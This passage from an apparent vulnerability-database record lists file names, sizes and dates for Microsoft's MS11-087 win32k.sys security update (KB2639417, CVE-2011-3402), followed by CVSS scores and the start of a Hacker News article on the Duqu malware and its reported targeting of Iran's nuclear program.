class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,884</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_8_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,185</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_8_for_kb2639417~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,914</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_rtm_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,786</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_rtm~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,878</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sp1_bf~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,783</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sp1~31bf3856ad364e35~amd64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,842</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,990</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7600.16920_none_1f78ff2de86c5af3.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">06:56</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7600.21097_none_1fbdc4c701bca5d0.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">06:56</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7601.17730_none_21548c47e59ae2d0.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">06:51</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7601.21866_none_21c3bb0afecb6e77.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">06:51</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><h4 class=\"sbody-h4\">Additional files for all supported IA-64-based versions of Windows Server 2008 R2</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_3eb6d791624db9cd2569c8087bf58f07_31bf3856ad364e35_6.1.7600.16920_none_7317cd9bb3625d24.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,036</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_4a74b22f4b17ef479dc0e1873f9bb598_31bf3856ad364e35_6.1.7600.21097_none_84ad772c089e76b1.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,036</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_55d649c2beeca864af2ae84d9b9c28b8_31bf3856ad364e35_6.1.7601.21866_none_f5669d7aab0b38bb.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,036</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_d2652e0580629bb11ad6ac51b98cbb54_31bf3856ad364e35_6.1.7601.17730_none_427afdc38a525e76.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,036</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7600.16920_none_b9075d4dfbac30be.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">42,088</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">07:37</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7600.21097_none_b94c22e714fc7b9b.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">42,088</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">07:42</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7601.17730_none_bae2ea67f8dab89b.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">42,088</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">07:37</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Ia64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7601.21866_none_bb52192b120b4442.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">42,088</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">07:34</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb2639417_bf~31bf3856ad364e35~ia64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,002</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_1_for_kb2639417~31bf3856ad364e35~ia64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">3,128</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb2639417_bf~31bf3856ad364e35~ia64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,197</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_2_for_kb2639417~31bf3856ad364e35~ia64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">2,925</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_rtm_bf~31bf3856ad364e35~ia64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,458</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_rtm~31bf3856ad364e35~ia64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,477</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sp1_bf~31bf3856ad364e35~ia64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,436</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Package_for_kb2639417_sp1~31bf3856ad364e35~ia64~~6.1.1.3.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,455</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">1,918</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">16:40</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7600.16920_none_1f78ff2de86c5af3.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">06:56</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7600.21097_none_1fbdc4c701bca5d0.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">06:56</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7601.17730_none_21548c47e59ae2d0.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">06:51</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File name</td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.1.7601.21866_none_21c3bb0afecb6e77.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File version</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">File size</td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Date (UTC)</td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Time (UTC)</td><td class=\"sbody-td\">06:51</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Platform</td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div></div></body></html>", "edition": 2, "cvss3": {}, "published": "2011-12-13T00:00:00", "type": "mskb", "title": "MS11-087: Vulnerability in Windows kernel-mode drivers could allow remote code execution: December 13, 2011", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3402"], "modified": "2012-05-08T16:01:10", "id": "KB2639417", "href": "https://support.microsoft.com/en-us/help/2639417/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2023-05-15T00:21:08", "description": "**Duqu** malware was created to spy on **Iran's nuclear program** \n\n\n[![The Hacker News](data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8Xw8AAoMBgDTD2qgAAAAASUVORK5CYII=)](<https://thehackernews.com/images/-eQNoB-MOkio/TrYnxTpMfgI/AAAAAAAADY4/7GQCPQFlIhc/s728-e365/photo+1.jpg>)\n\n** \n** \nA Report by Kaspersky Lab Expert, Ryan Naraine says that the DUQU malware was created to spy on Iran's nuclear program. IrCERT (Iran's Computer Emergency Response Team) Duqu is an upgraded version of \"Stars\". Back in April this year, The Iranian government says it is being targeted by a new piece of malware aimed at its federal computers. \n \nAlso its confirm that some of the targets of Duqu were hit on April 21, using the same method involving CVE-2011-3402, a kernel level exploit in win32k.sys via embedded True Type Font (TTF) file. \n \nIn both cases a malware similar to Stuxnet found in systems and stealing information. Do you think these relate to each other ? If we are to believe these reports, then it means that Duqu was created in order to spy on Iran's nuclear program. \n \nAnother interesting part of information is that more than 10 nations have supplied intelligence suggesting Iran is secretly developing components of a nuclear arms program - among them an implosion-type. New intelligence the U.N. atomic agency plans to release on alleged nuclear weapons work by Iran is fabricated, the Iranian foreign minister. Whereas , Iran dismisses reported UN claims of nuclear work. There are high possibility that **Stars** and **Duqu** were used to collect such information.\n", "cvss3": {}, "published": "2011-11-06T06:24:00", "type": "thn", "title": "Duqu malware was created to spy on Iran's nuclear program", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", 